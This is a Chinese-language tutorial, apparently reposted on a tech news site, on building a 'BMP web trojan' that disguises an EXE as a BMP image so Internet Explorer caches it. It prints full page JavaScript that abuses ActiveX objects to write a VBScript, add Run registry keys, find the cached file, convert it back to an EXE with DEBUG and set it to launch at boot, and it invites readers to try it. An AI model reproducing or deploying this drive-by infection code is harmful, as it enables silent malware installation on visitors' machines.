扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
(大家好,我是新加入安全中国的:丶.dspcoan,为了以后在安全中国结实更多朋友,我把我近两年比较有代表的原创BMP木马发表下!!!希望大家别嫌弃我.....)))
首先说明这不是什么新的东西,但最近有人说我们没有,那就随便写编文章放上来了,大家自己试验一下. 何谓BMP网页木马?它和过去早就用臭了的MIME 头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件,放到网页上利用IE和OE的编码漏洞实现自动下载和执行.
然而BMP木马就不同,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用网页中的javascript脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件,把它拷贝到TEMP目录.再编写一个脚本把找到的BMP文件用DEBUG还原成 EXE,并把它放到注册表启动项中,在下一次开机时执行.但是这种技术只能在9X下发挥作用,对于2K,XP来说是无能为力了.
看上去好象很复杂,下面我们一步一步来:
1) EXE变BMP的方法.
大家自己去查查BMP文件资料就会知道,BMP文件的文件头有54个字节,简单来说里面包含了BMP文件的长宽,位数,文件大小,数据区长度,我们只要在 EXE文件的文件头前面添加相应的BMP文件头(当然BMP文件头里面的数据要符合EXE文件的大小啦),这样就可以欺骗IE下载该BMP文件,开始我们用JPG文件做过试验,发现如果文件头不正确的话,IE是不会下载的,转换代码如下:
program exe2bmp; uses var len,row,col,fs: DWORD; begin |
以下是放在网页上的脚本
document.write(' '); function docsave() { a=document.applets[0]; a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}'); a.createInstance(); wsh=a.GetObject(); a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}'); a.createInstance(); fso=a.GetObject(); var winsys=fso.GetSpecialFolder(1); var vbs=winsys+'\\s.vbs'; wsh.RegWrite ('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs','wscript '+'"'+vbs+'" '); var st=fso.CreateTextFile(vbs,true); st.WriteLine('Option Explicit'); st.WriteLine('Dim FSO,WSH,CACHE,str'); st.WriteLine('Set FSO = CreateObject("Scripting.FileSystemObject")'); st.WriteLine('Set WSH = CreateObject("WScript.Shell")'); st.WriteLine('CACHE=wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellFolders\\Cache")'); st.WriteLine('wsh.RegDelete("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs")'); st.WriteLine ('wsh.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\tmp","tmp.exe"'); st.WriteLine('SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"'); st.WriteLine('WScript.Quit()'); st.WriteLine('Function SearchBMPFile(Folder,fname)'); st.WriteLine(' Dim SubFolder,File,Lt,tmp,winsys'); st.WriteLine(' str=FSO.GetParentFolderName(folder) & "\\" & folder.name & "\\" & fname'); st.WriteLine(' if FSO.FileExists(str) then'); st.WriteLine(' tmp=fso.GetSpecialFolder(2) & "\\"'); st.WriteLine(' winsys=fso.GetSpecialFolder(1) & "\\"'); st.WriteLine(' set File=FSO.GetFile(str)'); st.WriteLine(' File.Copy(tmp & "tmp.dat")'); st.WriteLine(' File.Delete'); st.WriteLine(' set Lt=FSO.CreateTextFile(tmp & "tmp.in")'); st.WriteLine(' Lt.WriteLine("rbx")'); st.WriteLine(' Lt.WriteLine("0")'); st.WriteLine(' Lt.WriteLine("rcx")'); st.WriteLine(' Lt.WriteLine("1000")'); st.WriteLine(' Lt.WriteLine("w136")'); st.WriteLine(' Lt.WriteLine("q")'); st.WriteLine(' Lt.Close'); st.WriteLine(' WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out",false,6'); st.WriteLine(' On Error Resume Next '); st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")'); st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Delete'); st.WriteLine(' FSO.GetFile(tmp & "tmp.in").Delete'); st.WriteLine(' FSO.GetFile(tmp & "tmp.out").Delete'); st.WriteLine(' end if'); st.WriteLine(' If Folder.SubFolders.Count <> 0 Then'); st.WriteLine(' For Each SubFolder In Folder.SubFolders'); st.WriteLine(' SearchBMPFile SubFolder,fname'); st.WriteLine(' Next'); st.WriteLine(' End If'); st.WriteLine('End Function'); st.Close(); } setTimeout('docsave()',1000); |
该脚本主要会在本地机器的SYSTEM目录下生成一个“S.VBS”文件,该脚本文件会在下次开机时自动运行。主要用于从临时目录中找出mybmp[1].bmp文件。
“S.VBS”文件主要内容如下:
Option Explicit |
本文章是本人04年的时候,认识了中国第一代黑客<朱睿》的时候辅助我完成的第一个原创编程木马教程!
忠心感谢朱睿大哥,祝:绿色兵团 越来越好!!
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。